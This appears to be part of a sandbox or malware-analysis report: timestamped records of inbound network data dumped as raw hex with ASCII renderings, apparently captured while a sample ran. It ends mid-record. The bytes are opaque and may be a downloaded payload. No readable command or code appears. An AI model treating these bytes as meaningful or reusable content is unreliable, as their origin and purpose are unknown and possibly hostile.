2021-12-01 15:22:56 UTC	21	IN	Data Raw: 15 8f dd 9d 1c 7e e5 11 1d e0 ec a1 bd 3d e0 08 eb 47 63 a0 86 22 34 82 3e fa c5 76 ff 53 a0 7d 88 2a 5b ae f5 c1 a0 7e 1b 2d e4 e9 72 ff 56 fa 89 b1 01 40 95 41 8e 53 35 f9 d4 08 d1 30 bf 37 fb 0e 11 1e ae 5d 5c d1 6e 16 91 fb df 96 4a 82 db db de ef aa 9c c3 6c 14 8b 21 55 29 d6 f5 2f 43 40 64 d5 69 77 77 a9 83 40 69 61 40 b6 b8 52 b1 69 e1 7b 83 ab 16 dd 97 d4 e3 09 f0 d6 f3 a6 6e 66 47 d8 e5 8e 44 dd cd b8 b3 06 62 46 7e ce ec d1 e5 1e 23 a1 f6 5f a4 14 85 41 0e 06 31 c4 4a 6a aa 62 5a 3b e2 0d 65 47 ff bf f2 d8 ea 24 b3 9c 95 5c e9 0b 97 4d 22 20 36 70 f0 da ae 85 4f 39 f5 4f a1 6d 6b 72 e1 82 be c7 56 4c c3 2e b1 09 7b 50 0c 72 78 0b 68 f8 54 70 ee d6 d5 aa 69 68 fd 70 d7 95 54 96 fb c3 43 1e c7 d9 e7 36 7b 85 af 99 5b d3 76 1c 39 6d ed 34 51 37 fc Data Ascii: ~=Gc"4>vS}*[~-rV@AS507]\nJl!U)/C@diww@ia@Ri{nfGDbF~#_A1JjbZ;eG$\M" 6pO9OmkrVL.{PrxhTpihpTC6{[v9m4Q7
2021-12-01 15:22:56 UTC	22	IN	Data Raw: c7 5f 44 46 96 dc e9 c5 a6 f2 bb e0 12 10 1e d7 2f ad ec 35 f3 2b 4f ef ad 1c 25 5c 28 27 d9 26 23 a1 63 1a cd 44 9c 7c c3 59 3d e7 92 a8 a2 a3 72 e8 27 61 41 c2 c4 4d 8c f3 a0 71 6c 0c 13 dc fa d1 73 64 50 d4 66 16 08 7c 86 60 20 bd 73 a5 f8 51 3b 01 32 97 35 f4 46 58 a3 7d 02 bc 4c 16 9f 33 d7 68 fa a0 04 3d 0d 66 cd ce a7 26 34 5a a7 1c cf 0e 45 50 bb 2a 9a 46 01 cd 3e 94 d9 f1 60 c9 44 81 47 57 ba 49 05 66 4f 6b bc a4 7d 86 c9 b2 bb ff 8c 27 a2 f7 57 e2 0c e9 a4 a2 72 fc 45 0f 7a 59 34 de 12 16 c4 ce 35 f9 44 0a 24 29 df 96 ba 59 6f 4c 03 67 4c 01 2b 5f 89 ac 09 81 ef 56 3d 7c dc 10 1c 3d 0f d1 6c 0d 61 41 ca cb d4 65 cd b3 8d fb 09 76 1f b8 5a d3 78 f4 56 b2 1d 21 64 c8 ca cd a7 1a 46 2c 17 8c 2e 94 43 95 4f 43 fe d4 be 7f 9a 46 93 25 d7 19 67 43 1d Data Ascii: _DF/5+O%\('&#cD|Y=r'aAMqlsdPf|` sQ;25FX}L3h=f&4ZEP*F>`DGWIfOk}'WrEzY45D$)YoLgL+_V=|=laAevZxV!dF,.COCF%gC
2021-12-01 15:22:56 UTC	24	IN	Data Raw: 9f 6d b7 2c d9 ff ca c7 57 27 48 29 dd 5d 4b e7 15 5a ab 88 f8 57 2c 36 e0 87 b7 c1 c6 5c c8 c2 da ee a1 b3 4e bb 37 fd 35 32 b7 cc 53 aa ec 23 ac 94 af 01 72 7b b8 61 94 d4 79 91 4e b5 f3 41 13 17 9d 1b 21 07 91 d1 14 80 8a 3a e3 0f 9a ac 07 e4 1d b0 85 af 9f a7 dd 8a 27 b0 6f 91 c9 06 7c 00 c7 b3 06 95 56 9d 22 c0 24 a7 e3 13 0a ed 3c 7a 88 cb ca 3f 0a 11 91 a9 8e 34 96 58 33 49 0b f7 c7 c6 22 c2 3e 63 3b 65 c5 47 a0 17 4f 23 32 4d 8f 27 bb c7 4a fa c2 52 b6 29 c5 c5 aa 8e ad 11 ed 26 4c 4d 0c e2 02 17 7c 94 31 2c 3f 3f 69 3a 76 8a e9 e7 a9 cc 68 72 11 12 5d df df 90 4b 1c 3a 83 37 0d 76 b5 57 95 51 23 a6 6e ea 29 40 5b 58 a1 ee db 74 2a 44 88 32 49 f0 ba 2b ca ca c4 c4 30 84 a2 f9 c2 d5 6b 77 a7 c1 d3 74 e1 16 c3 4d 93 e9 00 58 bc ad e7 f3 b2 02 ec 2a Data Ascii: m,W'H)]KZW,6\N752S#r{ayNA!:'o|V"$<z?4X3I">c;eGO#2M'JR)&LM|1,??i:vhr]K:7vWQ#n)@[Xt*D2I+0kwtMX*
2021-12-01 15:22:56 UTC	25	IN	Data Raw: a5 8c 3d 73 52 61 4c 74 13 f4 d8 ba 33 c4 d9 78 11 98 55 c4 45 5a 5b 6b c4 d1 8d 61 a2 96 b6 f0 a3 ad 12 12 84 17 94 c8 f8 86 d5 ad ad 94 d2 d0 02 0b 14 0a 62 ce f9 40 39 a5 f3 ac 81 75 c2 02 e0 39 57 1d 4f de 88 ad 0d e1 06 f8 c4 42 95 37 6f e6 e2 eb 28 8d ee 16 84 1a 80 1e 3b f4 10 06 b8 b2 8b 29 ef 49 be c2 18 e6 ff 53 b1 42 65 d7 93 fb 23 51 c8 3b 0a 1d 5b a0 83 58 a2 1c b5 51 f7 cc cb 5f ab e7 72 75 d7 9c 12 0f 1f 7d 92 b1 4d e7 1b c1 ce 74 e2 9c f5 94 4d 04 fb 5b 34 91 3c f1 99 0a 0f 9b ff ca 07 6b 8f 9b 90 5f 4d 04 69 4e a4 9a 7e 08 f3 0c e0 25 ff 1a a3 88 70 b3 76 e0 88 59 a1 ab 4b 04 f4 45 84 ba be 36 ff cc 26 98 30 b9 e3 84 3c 6e e8 ac 08 26 27 ad 00 7f fe b4 42 08 06 94 d8 7b ea 5d c5 01 ad 12 1d a0 e4 f0 00 5c 2a 7c 92 a7 c9 c0 50 80 95 23 99 Data Ascii: =sRaLt3xUEZ[kab@9u9WOB7o(;)ISBe#Q;[XQ_ru}MtM[4<k_MiN~%pvYKE6&0<n&'B{]\*|P#
2021-12-01 15:22:56 UTC	27	IN	Data Raw: 0c e1 50 a2 b2 89 4f a9 ac 8b 5f b2 ce 1b a0 72 e2 9d d6 f6 b2 ee 45 28 a3 72 90 c1 1d 73 7c 15 81 73 63 54 b4 b9 a1 73 34 5f 54 b4 76 07 9c 54 2b 83 ad 15 81 af 7e 58 11 9e 6f ff ae 98 8b a0 6e e8 3c 2b 20 cb 40 6c 77 a3 ee c9 d0 76 45 17 9b e4 fc 07 69 0a e5 80 95 30 11 6e d0 d0 5c ce fd 07 7d 8c 2f d6 79 00 e3 80 0e 0c 1c ac 14 70 0d 24 c3 e5 82 39 60 2f 94 be dd e2 b7 36 67 db 00 dc 80 94 11 79 4a b2 81 bc a3 0d 24 f5 62 ca cc 5a cd e7 19 c3 ab 7f 70 61 06 68 bd 33 c6 d5 62 21 4d ba c5 94 49 06 f6 58 34 d9 6c f1 a5 e8 d3 90 c6 88 3a 7f 9d fc 0c 58 15 83 aa 48 94 4d 09 72 7c 9c 74 e2 0b 63 b1 f8 c3 7c 03 79 9e 69 3e 92 e6 0d 7b b1 bd 98 5d 5c 3e 93 a0 85 11 94 48 1d 5e 73 9c e0 9e 79 91 da ff 29 a8 70 6a e2 0b fc ce eb b6 ba bb c9 0e ac 23 ac 97 2f 5e Data Ascii: PO_rE(rs|scTs4_TvT+~Xon<+ @lwvEi0n\}/yp$9`/6gyJ$bZpah3b!MIX4l:XHMr|tc|yi>{]\>H^sy)pj#/^
2021-12-01 15:22:56 UTC	28	IN	Data Raw: 3c f5 36 ff 88 72 6e 81 3f 91 28 fb 1f 6c 54 76 83 0d 69 90 f0 a2 20 26 85 08 bf dd 5b 9d b9 c7 fb bc cc 69 fc 74 f2 0b 39 9b 6a 41 58 b5 69 93 5b 3e 46 47 a6 16 be ab 35 21 0d 9d 70 1a bf 74 02 1e f8 c3 fb 57 3a 1b fc 74 3b 47 b8 ef 9b b9 5f 2d 09 b1 13 24 ed 27 e7 0f 5e 84 1e 87 c9 60 98 c3 ed 22 c0 49 9b bb 5f 52 ec d0 62 53 60 77 61 69 7d af b4 41 39 28 dc fa fc c7 4a a4 23 cb 97 a6 6c 8d 2b fc 7b c4 db 8c 88 4c 65 f3 3e 27 a3 75 2c 4f f6 df c0 33 ff 35 7a a6 66 41 02 99 b0 50 12 6e f6 23 d4 e3 d4 13 9e 9e 96 5d 1b 29 7e f9 7b cc 1d 89 55 a8 19 67 e4 ac 81 ed f3 f4 2c d4 c3 4d 83 f5 51 11 26 be 9a 23 60 40 d1 8b ac 59 09 09 cf 73 86 04 9b 84 f5 de b4 e1 7e 45 d7 3a 0a c7 00 a7 15 3f bf 1e f9 c0 0f 04 f4 fe 49 07 b7 b2 c9 d7 5c 02 9c 19 ba 37 77 7c dc Data Ascii: <6rn?(lTvi &[it9jAXi[>FG5!ptW:t;G_-$'^`"I_RbS`wai}A9(J#l+{Le>'u,O35zfAPn#])~{Ug,MQ&#`@Ys~E:?I\7w|
2021-12-01 15:22:56 UTC	29	IN	Data Raw: 5d 01 d9 f4 40 84 c8 2d 94 1d 1e 38 6c 6c 90 5d 2b c2 78 1f ad 84 b3 ec 0c 35 30 4c 85 1d 58 b9 a1 1c c8 df 17 74 f6 d7 e3 9d ea 00 37 08 58 cc 3b 7c 33 37 94 2c a9 8d ea d1 e3 57 32 c4 d1 b7 23 1a 6a 0d 9c 45 f4 cd 90 49 d5 7d 45 17 9f f0 2f 02 fc 45 06 f0 e9 b5 d9 0b 66 c5 5b 44 9f 91 4b 0b 63 49 02 e4 42 bc 09 6d 75 04 94 a2 fb c6 4c b2 57 c3 c1 46 02 7f 8a b8 a8 4a 90 bd d4 20 36 8f 92 74 09 6e e9 23 c4 35 5b 41 18 08 83 6c 60 43 0f 4f 3b 61 5f 4d 91 2e 53 d4 18 e2 f6 65 1c d3 74 e1 16 95 da 20 20 33 ce e4 00 cc 10 1d a6 72 fc af c8 c5 b4 d7 77 9a 47 14 16 95 40 78 6d 8c 84 37 e4 94 7a bc 3c 6c 6e d1 bd 79 66 7e 30 a0 8f b7 a7 d6 38 a1 7f 6e 28 4c 07 76 15 04 70 e4 ff 31 22 d2 bc 3d 19 87 b3 95 f9 33 37 92 49 0f 9a 47 11 27 c3 aa 6d 13 19 95 40 e0 0b Data Ascii: ]@-8ll]+x50LXt7X;|37,W2#jEI}E/Ef[DKcIBmuLWFJ 6tn#5[Al`CO;a_M.Set 3rwG@xm7z<lnyf~08n(Lvp1"=37IG'm@
2021-12-01 15:22:56 UTC	31	IN	Data Raw: a1 ee dc e6 49 b3 05 73 66 5d 3a 8f 90 ab b5 20 3e ea 63 39 f7 df 9b 7b a2 79 90 c1 58 aa f7 56 40 66 c5 52 b4 f5 d5 fb ae 80 1e 3b f4 90 d7 c5 ef a1 07 03 84 ca c0 b8 2e d8 eb af 08 e8 fd c8 0a b0 94 48 80 8b 37 1f b7 35 e4 e1 7c e2 ed ff af eb ae 82 a7 8f 3b 73 fe 32 5a af 1e a9 2d 06 51 f0 ac a1 3c 73 66 cf 6c 30 a7 7c 30 9a 49 0d 60 d5 b4 aa 00 f1 7c 1d b9 37 f6 9b e8 b8 61 c1 45 c8 24 af 99 2a e9 2a cc 23 30 40 7b 55 7e 97 3b e4 71 c9 bc 56 09 50 54 21 eb 5e be 3e fb c7 9c 51 21 b6 b6 2a 07 8b a7 e5 81 41 f0 4f 3e 60 dc 07 34 20 93 dd 83 22 49 0f 12 82 32 53 2b da 1b 44 a7 af e4 01 41 8e 63 51 ad 6b b7 5f d9 39 34 5f 50 b6 3d 7c 19 17 15 41 10 1c 3d 77 7d 63 da ba df 98 46 94 d4 69 3e 63 4c 8a d3 ec 24 af 99 d6 7c 55 d8 f6 5f 56 50 00 b2 7c 10 f4 53 Data Ascii: Isf]: >c9{yXV@fR;.H75|;s2Z-Q<sfl0|0I`|7aE$**#0@{U~;qVPT!^>Q!*AO>`4 "I2S+DAcQk_94_P=|A=w}cFi>cL$|U_VP|S
2021-12-01 15:22:56 UTC	32	IN	Data Raw: 5c 31 c0 ae 01 74 09 f5 ea fb 2c c6 5c e6 e7 7d b6 09 77 8b a5 7d ea 3c 2a 17 8e 50 a0 4e cd b1 1f b1 34 56 b2 88 2b 72 11 8f 4f 65 2b dc 0a e9 a3 9d 72 63 40 7b ec b0 02 f6 dd 0c c0 5d b0 6b 33 d4 f6 5c d8 74 6b 73 07 63 80 92 cf b5 34 59 26 b4 2e 49 93 3a 78 d4 f2 d3 93 4b 8f e1 69 84 77 8c 81 b1 15 11 fb 20 b3 39 33 df 24 66 8c b1 17 91 d2 51 24 a6 94 6b e1 1d d0 fb ca ca 38 9b e2 4c 71 e2 8c 06 6c ae 41 1d b5 2e 3d e3 93 db 87 2b 4e 68 fc 4c 81 2f 49 26 f6 59 e3 84 e3 86 b6 8f cf 87 49 ff bd f6 44 9a 48 00 34 64 0d 66 38 8b 38 fb 97 b3 a8 81 b0 95 56 3d cc 2c b5 02 62 c8 d5 68 6a 0b 6f a7 44 0f 0e 2c 56 af 0e ef 41 e4 fb 89 8c 26 3a 74 71 52 35 65 0c 9b 16 97 c8 36 ad 04 6f f6 ce f1 a3 e8 d2 1d f5 35 b9 2c 5b db f5 cb c1 2e 9a b7 b4 2f 5f 55 37 f7 23 Data Ascii: \1t,\}w}<*PN4V+rOe+rc@{]k3\tksc4Y&.I:xKiw 93$fQ$k8LqlA.=+NhL/I&YIDH4df88V=,bhjoD,VA&:tqR5e6o5,[./_U7#
2021-12-01 15:22:56 UTC	33	IN	Data Raw: ed 71 b6 47 2f 84 04 ea 3b 76 78 12 f8 26 95 f0 33 c5 c5 6e ee b6 88 fb 07 ba a9 8c a8 a6 85 27 34 5a b7 38 72 15 04 a8 d6 e5 88 37 00 58 3a 0b 82 c5 14 ae 27 a5 e7 18 6f 82 ba 32 55 3f 3d 09 f0 a0 0c f7 dd 94 ab 84 cd 30 ac dd 46 95 d7 67 da 8f c3 c3 6f 78 8a ff d5 6d 75 06 63 07 8a d5 2a 10 13 9e 65 c3 30 51 f6 c3 45 0d 66 3f a9 2e b2 85 bb a3 9a 5f c5 3a 00 c3 5c d2 ee f4 47 c7 49 f5 91 4b fe 4a 8c be ca d4 69 ff db 90 58 39 1f b9 2c 5b b4 4a 10 62 38 17 c4 67 65 57 49 10 c2 34 25 58 35 be 20 74 f6 56 a8 9a b2 63 be 02 c8 0a e9 a2 63 5a 59 b3 94 41 03 74 e6 fe 8a b5 a6 6d 75 90 48 c2 e1 50 a7 ec be 7a 07 ac 84 a2 40 73 62 cd 4a 6f 9b b0 d1 a0 75 9b 6c c6 7b 8a 2b d1 81 36 e2 1e 34 4d 18 ff 75 fc a9 d5 f7 4d 00 cc c5 54 8f bf c0 a6 63 db a3 46 09 56 6d Data Ascii: qG/;vx&3n'4Z8r7X:'o2U?=0Fgoxmuc*e0QEf?._:\GIKJiX9,[Jb8geWI4%X5 tVccZYAtmuHPz@sbJoul{+64MuMTcFVm
2021-12-01 15:22:56 UTC	34	IN	Data Raw: 2f d7 03 d8 77 15 9d fc 49 94 b8 14 2e 4f 32 57 2b 4d 7b 48 99 46 0f 72 e2 0b 69 43 f0 d8 71 21 44 fc e4 87 20 7c 1f ea 39 8e b6 2e 0b e9 c2 34 44 9e 78 f0 d5 dc 7a c1 40 7f 8c 3a 9c eb 21 e1 8e 5b 5a 5e 78 50 72 7b 1d c8 c4 ce fb 89 e8 df 9a 50 34 9f ef 31 e4 46 93 d3 76 e0 82 b6 fc a4 cb 2d 2d b7 a8 d4 0f 9a b2 9e 1b 3d 98 d0 fc b7 30 7b 0e 16 8c 24 9c 7d e4 8a 2e d9 60 59 2d 06 66 5d 5b 19 f6 b4 b0 99 45 7f 6f f1 2b 97 c8 cc c7 aa 59 3e a1 2d 04 3c 90 1e 2f f8 4f 3a e0 24 37 16 72 f3 0d 63 42 1b df 81 20 04 ef 37 8a 29 d5 7f 12 4c c7 49 04 e1 76 d2 f6 9a 93 05 ab e8 71 11 f6 56 ae 13 fe 5a 46 ac f5 79 80 01 d8 86 3f 75 f6 4f af 6a fe 49 1b 32 dd a6 6f 76 14 f4 9a 5f 97 0d a1 2b 23 d1 57 15 83 a6 f1 92 4a 66 b0 a0 d4 fe 5f ce 8e 46 17 b3 14 8f 4f 38 70 Data Ascii: /wI.O2W+M{HFriCq!D |9.4Dxz@:![Z^xPr{P41Fv--=0{$}.`Y-f][Eo+Y>-</O:$7rcB 7)LIvqVZFy?uOjI2ov_+#WJf_FO8p
2021-12-01 15:22:56 UTC	36	IN	Data Raw: 19 71 14 10 63 53 36 b3 f4 d3 25 69 70 f0 26 d9 f4 d4 9a a7 df 2e a9 08 ed 23 20 69 89 24 d4 90 84 d9 93 ab 39 e7 83 b2 08 6e 81 5c 4e 3f 93 12 f2 d4 94 7b 98 4b 1a 92 61 f6 ec db 89 7e 0b b4 23 5b 59 bb f0 5f 8e 81 63 e9 66 df ac 9d fa 57 26 c4 4e 78 f5 a2 8d 9e 15 7b 96 4f de e5 64 8d e0 f8 53 36 e2 60 c3 6f 7f 87 b7 36 94 b3 ec a2 28 b6 d3 0d 89 dc d1 51 08 60 41 97 0c 2a f3 a1 dd 62 54 c7 d2 b0 08 ed bd 33 38 83 37 25 b2 01 d5 2f 2e bc 13 ee 60 6d 3a 76 1e af 62 db 11 a5 38 62 22 d5 e0 5d a5 d1 e5 1f d1 6a ff c4 21 23 5c 9e 8b 99 6f 22 29 d9 f2 19 98 ba fa 53 ab 84 3e fc cc fc 46 80 18 ca d7 61 56 a7 04 b3 21 40 65 42 09 f0 6a fe 42 90 bb b7 1e 78 1a 18 02 0d 18 0b 81 bd 21 29 ba a5 d5 e8 39 f5 da 74 23 17 8b 34 d3 07 7f 9d fc a4 85 49 43 bb 48 8b a5 Data Ascii: qcS6%ip&.# i$9n\N?{Ka~#[Y_cfW&Nx{OdS6`o6(Q`A*bT387%/.`m:vb8b"]j!#\o")S>FaV!@eBjBx!)9t#4ICH
2021-12-01 15:22:56 UTC	37	IN	Data Raw: 8b a5 e4 09 79 90 c9 46 18 4b 17 f5 7d 9d cc a2 61 c1 53 9f f4 51 30 d8 35 fe 5d 2c 4c d0 c3 35 fc 4f 31 4c 52 a3 79 a2 c8 90 80 8c cd d3 83 ba d9 06 e8 a6 9f fc da 99 c9 3a cd 22 b3 d6 fe 7a 3e 7c 9b 60 d1 ef 9b 49 68 ea 52 3b 66 c2 c1 56 b0 b0 b8 8d ad 00 c2 4c 70 fa c9 6e 03 2d 1d 20 ca 4f 46 a0 14 06 73 ea 31 52 36 77 09 5e dd f6 e6 68 60 2e 57 8a 6c e5 e7 0d 94 44 11 74 ed 80 65 41 0c 82 20 68 ce cf 79 91 da 65 ca c3 c1 df 86 11 47 80 ef 3c 99 db 1e e8 32 7d a6 70 78 1a 0d 1e 9f fc d3 f8 43 b7 5a b8 cb dd 07 7b 19 15 82 00 a3 ee 34 2a 4e 3a 49 3f e4 03 7c 93 27 ad 8a 47 0b 3b 36 f9 28 d3 f0 2f 41 94 44 fa 6e f4 cb 34 c0 57 29 40 bf 28 53 4b a9 6b ca b4 8a 4d 00 d9 2e de e2 1a 19 83 b5 5b 71 17 82 27 af 90 d7 63 d9 e9 b4 2b e7 78 4f ed 21 44 03 9b fc Data Ascii: yFK}aSQ05],L5O1LRy:"z>|`IhR;fVLpn- OFs1R6w^h`.WlDteA hyeG<2}pxCZ{4*N:I?|'G;6(/ADn4W)@(SKkM.[q'c+xO!D
2021-12-01 15:22:56 UTC	38	IN	Data Raw: ac de 90 10 ac 06 0e 0b f7 53 2b 24 c1 cb 9b e4 e3 13 5f 50 0a db f3 21 ce 57 9c f6 dd a8 1d d3 fc c1 d1 fa 3d 64 af 96 c0 20 bb 18 86 0e 9d 72 7d 6f 09 f7 e0 ea c4 23 4e d7 e1 f0 d4 10 e4 f9 b8 37 b3 f7 28 9e a5 8d 37 8b 64 1f 79 57 12 80 74 2b 17 57 e3 e5 0b 2a 99 00 07 b3 64 56 e7 47 df 56 78 26 a9 50 7c d6 3f 2f fd 40 26 f3 62 17 5a cb cd 49 ae 29 7b 3e 5f db 91 66 63 fb 6e 81 3d f7 64 7f 32 fe de 16 d0 27 ec 29 4c 0b 62 d8 d9 8e 42 f9 95 d4 f2 43 eb 41 2a cf 76 0f a0 8d aa 8e 66 3e 6c f9 49 46 8b 92 1d a2 43 50 b4 ab 6f 71 00 33 35 c8 5b a5 e3 96 29 37 ef ae 95 a9 ea 2f d0 61 03 6e da a8 89 a6 17 90 23 a1 9b f7 e3 79 64 fe d1 86 34 56 9b 0b 6d 63 d0 b4 0a fe 7d 73 8e 63 c0 43 02 6c 9a 53 b7 0d 73 ce 9b 24 09 e5 7a 02 43 24 f6 ab 07 4d b2 22 18 45 05 Data Ascii: S+$_P!W=d r}o#N7(7dyWt+W*dVGVx&P|?/@&bZI){>_fcn=d2')LbBCA*vf>lIFCPoq35[)7/an#yd4Vmc}scClSs$zC$M"E
2021-12-01 15:22:56 UTC	40	IN	Data Raw: e1 cc 2a ac f2 17 6b e4 4f b5 43 0e 04 fa 57 d7 96 da 33 dc b7 31 7e 6f 09 af dd 54 75 8c 6c c9 5d 5f c6 bc 93 a0 9e 6c 99 51 2f 4a 91 e7 91 b4 2b b1 af 37 62 cb f9 45 9b ec 3a 63 50 bc 30 de 1a 05 76 1a 05 c2 5b 50 bb 21 bd 2a 8b cf de 2d 5e 87 be bc ac 9c 78 72 74 fe 46 8f d3 74 f1 9b a9 00 c3 59 2e 5e cb 20 a9 b8 a8 06 be ab 0c e3 05 b0 88 ae 0c 8f c5 5a a7 e1 05 e4 95 d7 6f 60 c3 5a 30 1b 1e 3d f1 a2 61 cd 1b ac 85 ae 88 2e f4 de 8e e7 84 3d ee 2b 65 44 97 da e3 58 92 f6 61 f4 2f a9 9c 75 90 4a 93 d7 d3 f6 57 ff 18 93 07 6d 8b e7 9a de 92 c2 d3 7e 18 09 e7 6a 4c 9c 4e 28 db 8f db 9e 7d 83 8f 99 d2 c8 ad ab 17 8b ab 07 61 73 f9 c6 dc 02 f8 44 a4 f8 cf 65 5e d1 77 83 de 41 a6 66 c6 d5 68 ea 02 95 4a 1e 25 ad 0f 93 cb d8 19 9a 54 84 c1 de 46 2c 5a ba bf Data Ascii: *kOCW31~oTul]_lQ/J+7bE:cP0v[P!*-^xrtFtY.^ Zo`Z0=a.=+eDXa/uJWm~jLN(}asDe^wAfhJ%TF,Z
2021-12-01 15:22:56 UTC	41	IN	Data Raw: c5 26 de d6 e4 e4 42 26 5b 50 a0 e9 df 3b 6a cd 9b 5c 52 35 fc a8 a2 07 6a ff c5 cc 2b d1 e5 0c f8 47 9d 73 7c e8 c5 bb 57 42 86 31 cf fa 31 d2 cd 47 14 16 0c 72 a1 0f f1 1e 0a 62 8f 34 2a d7 d1 6e ba 91 3f 07 23 ef 98 de 36 00 b3 fc da a4 e7 cb 54 a5 e2 02 28 51 34 46 9d 76 81 b1 1d a3 ec f7 d0 01 27 38 74 ed b6 bf 23 e0 1a 0d 63 4d 90 76 03 a8 99 d4 f5 da a8 48 71 63 49 9c 11 85 51 a0 e3 8e 52 b1 05 86 48 7c 28 50 a6 f9 4d 17 19 b6 a9 81 32 5c d3 72 ee aa fe 9e 62 42 8a 13 85 21 2e 4d 03 a6 66 48 06 f1 b2 b7 32 b9 bd 4b 64 d6 e9 b3 e5 1c f8 56 53 cd 0e 79 95 c0 b0 71 58 a0 71 6a e3 3f 0b eb 3d f2 cf 84 76 fc 5d 41 13 08 81 5c 2b 47 5b ad 73 33 4c 3e e8 db 05 09 ec 78 ec 26 2c 44 48 88 34 48 97 51 af 78 51 30 4f fc 4a 66 f4 c1 27 9f eb b9 29 94 83 be a0 Data Ascii: &B&[P;j\R5j+Gs|WB11Grb4*n?#6T(Q4Fv'8t#cMvHqcIQRH|(PM2\rbB!.MfH2KdVSyqXqj?=v]A\+G[s3L>x&,DH4HQxQ0OJf')
2021-12-01 15:22:56 UTC	42	IN	Data Raw: f9 c2 43 75 44 6e 56 9b 98 db ea fa 5e 0b 6a c9 c1 1c ee 29 71 77 a9 92 18 c8 d4 20 37 92 df d5 ad 16 0a e7 0b e9 f3 35 6d 71 e4 8d a7 63 c1 54 3f f4 44 41 0e 7e d7 6d 73 65 8a b7 bb 5c 29 a0 c1 58 a9 07 ba b5 12 ee 34 47 1f 5c 3e a9 81 5b ca 8d f7 db 98 41 de 11 03 f9 90 bb d2 b3 23 a7 fb c8 5c e9 58 59 c0 2f 85 44 f0 62 7b 20 61 05 3f 52 17 ee da 65 0d e7 cb 19 8f c6 d4 76 85 aa 29 ba 55 d3 cf 3c ec b3 87 2b 5d c1 c0 2a c0 36 e5 12 8b 24 a4 f2 b2 dd 0e 89 f5 4b 9a 6c 68 71 30 ab 8f 44 4f 38 71 62 2b 29 4c 64 cf e2 f0 39 66 2b 9d 6e 07 4e 29 39 8d 3d bc 76 01 4f 3a 3a 27 79 95 ca 56 c8 c7 ce c8 d0 79 32 5e d1 79 75 99 36 5c 50 3b e5 73 ee d8 cd bc 6b 73 98 d7 e5 b4 de cc a9 15 91 3a 41 95 fc b1 5b 90 a6 53 bb 14 ce c8 a2 78 7c 87 9f dd cd cf fe 7e 88 18 Data Ascii: CuDnV^j)qw 75mqcT?DA~mse\)X4G\>[A#\XY/Db{ a?Rev)U<+]*6$Klhq0DO8qb+)Ld9f+nN)9=vO::'yVy2^yu6\P;sks:A[Sx|~
2021-12-01 15:22:56 UTC	44	IN	Data Raw: 58 36 40 d4 77 aa 83 3f 42 9b ff c0 32 c7 d7 fe 14 fb c8 c9 46 18 97 33 c1 52 ac 6a 09 9a 32 a8 96 42 84 a3 7a ea 3a 76 1e ce 04 bf 52 bd 2e 41 94 1f 53 31 ca d1 e7 12 f4 45 13 92 a3 12 e2 42 74 92 50 bc 3b 72 1a 10 1a 05 bf 8b 56 76 1c a7 7e 80 f3 25 29 59 25 ae 94 bf dd 67 d2 ac 68 fc 49 06 1e d5 94 ba c5 0e 5b 58 a8 18 6a 71 ea 52 69 da 7f a7 95 cc c2 d8 76 80 2c 53 3f f5 49 88 65 a6 8f 38 39 dc 0a ee 21 28 7d 41 1f bf 3e 97 32 bc 94 d7 16 0c e5 77 71 2b c4 a8 81 b3 87 db 70 03 88 b6 c4 3c 07 7b 7f b4 dc e4 92 10 81 fc a4 9a d9 83 51 cb f6 4c 70 67 94 51 ba 2c e8 33 db 9b 64 1a 1c a9 c4 dd 07 af 43 84 e3 c1 d4 60 9a d1 6c e6 c5 4e 2e 52 a8 48 23 7a 14 13 8a 31 02 f8 b7 3f e0 5e 51 7e 0a f8 c1 17 19 ac 87 a1 82 30 43 1d b6 77 94 df 5a 06 ea b9 3d 80 06 Data Ascii: X6@w?B2F3Rj2Bz:vR.AS1EBtP;rVv~%)Y%ghI[XjqRiv,S?Ie89!(}A>2wq+p<{QLpgQ,3dC`lN.RH#z1?^Q~0CwZ=
2021-12-01 15:22:56 UTC	45	IN	Data Raw: 04 04 ca 53 a4 75 06 13 91 27 51 d5 23 19 8e 44 97 52 da f3 3b db 44 e3 13 52 5e 68 a5 a4 70 f0 2f 1f be 66 6d f4 bc b6 46 63 a8 d8 cf 7a 15 8a b1 6b 67 d9 f5 da 72 76 34 48 97 cd ae 6a 05 3e 14 27 a5 e6 9d 18 16 7b 92 9a d3 fe 59 b5 a6 a5 e3 8e 53 b7 2c d9 8e c7 c6 39 3b e0 f7 3c fa dc 1a f3 5c 97 8a 2a 5c d8 7b ed 43 80 98 9e 6f 63 53 82 5f 93 5b c6 4e a2 fc 16 6e f2 2b d0 04 1e c8 82 49 6a f7 ca 5c 57 c2 5f 35 f3 12 77 5f 45 85 ad 17 50 a4 f0 38 66 1c dc 8b 3f 37 fa 52 b8 38 44 82 85 87 61 44 09 e1 91 2c a7 0c 1c c7 a8 dc b6 c9 4e bd b1 6e 01 d0 02 f7 36 87 4c c3 45 7b 94 49 92 c2 c3 b4 54 c2 13 ee 26 3a ea b9 35 04 07 3e 94 35 f3 b0 1d 3d f3 21 ce 00 72 ec f4 42 f8 5e 56 36 e0 81 39 2d 30 54 6d 65 d4 b3 ac 8b b4 bc 53 c7 25 c0 95 c8 c0 24 44 8f 3c 86 Data Ascii: Su'Q#DR;DR^hp/fmFczkgrv4Hj>'{YS,9;<\*\{CocS_[Nn+Ij\W_5w_EP8f?7R8DaD,Nn6LE{IT&:5>5=!rB^V69-0TmeS%$D<
2021-12-01 15:22:56 UTC	46	IN	Data Raw: bc af 0a 7b 00 cc cf 9e e4 9c 0a e1 96 4f cc 58 c8 65 43 03 7e ff 85 6f 26 26 21 37 91 35 0a 1b 27 e0 e0 78 f2 02 20 0e 33 36 f6 1e b9 46 9e 6b 75 95 2f 7e 33 09 6e f0 2f cb a6 f9 54 b9 3f e9 a4 95 fd 43 10 00 c5 5a b1 d5 f1 39 f7 ca c7 56 e0 2b 94 49 0c 72 31 cd d5 70 71 81 b7 dd 58 b0 72 19 e6 9e 63 4f 23 a2 75 d8 d4 8c 24 2c cd 2d 34 d3 11 42 81 0f f1 58 2b 9a bc 9f 64 4b 12 99 42 92 a2 bc a7 f9 d1 70 7b d4 e4 0d 6c e5 79 53 3d 14 e7 f3 ca a7 fa 57 b8 8e af 94 7d 58 e2 97 9f fa 5c db 9b 6c 71 61 a3 16 f7 9f a0 06 e9 bd b0 1f bb c0 d8 8f 9b fd c1 d1 ff c9 de eb a6 7b b8 55 dd 74 ac a5 ae 92 58 2b 5c d6 11 6b 3e 6d 36 7e 04 6f 58 05 4a 8a 2f c8 cb b2 12 51 d7 05 a7 ec 21 10 2f 2d ac e9 e8 c8 4a f7 5c 94 a7 e5 89 ae 77 21 9c b4 ba ae 80 10 f8 c7 cb 35 f6 Data 